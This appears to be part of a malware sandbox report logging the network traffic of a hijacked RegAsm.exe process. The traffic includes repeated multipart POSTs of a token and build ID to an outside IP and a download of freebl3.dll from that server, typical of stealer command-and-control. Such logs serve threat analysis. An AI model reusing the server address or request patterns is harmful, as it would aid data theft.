2024-04-24 14:48:23 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-24 14:48:23 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-24 14:48:23 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-24 14:48:23 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:57 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:57 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KJKKKJJJKJKFHJJJJECBCont
2024-04-24 14:48:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:58 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:58 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:58 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 45 42 47 43 41 41 45 43 42 47 43 42 47 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------AFIIEBGCAAECBGCBGCBKContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------AFIIEBGCAAECBGCBGCBKCont
2024-04-24 14:48:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:59 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:59 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IEHDBGDHDAECBGDHJKFICont
2024-04-24 14:49:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:01 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:49:01 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------EGDGCGCFHIEHIDGDBAAECont
2024-04-24 14:49:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:49:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:01 UTC	158	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:02 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:02 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-24 14:49:02 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-24 14:49:02 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-24 14:49:02 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-24 14:49:03 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
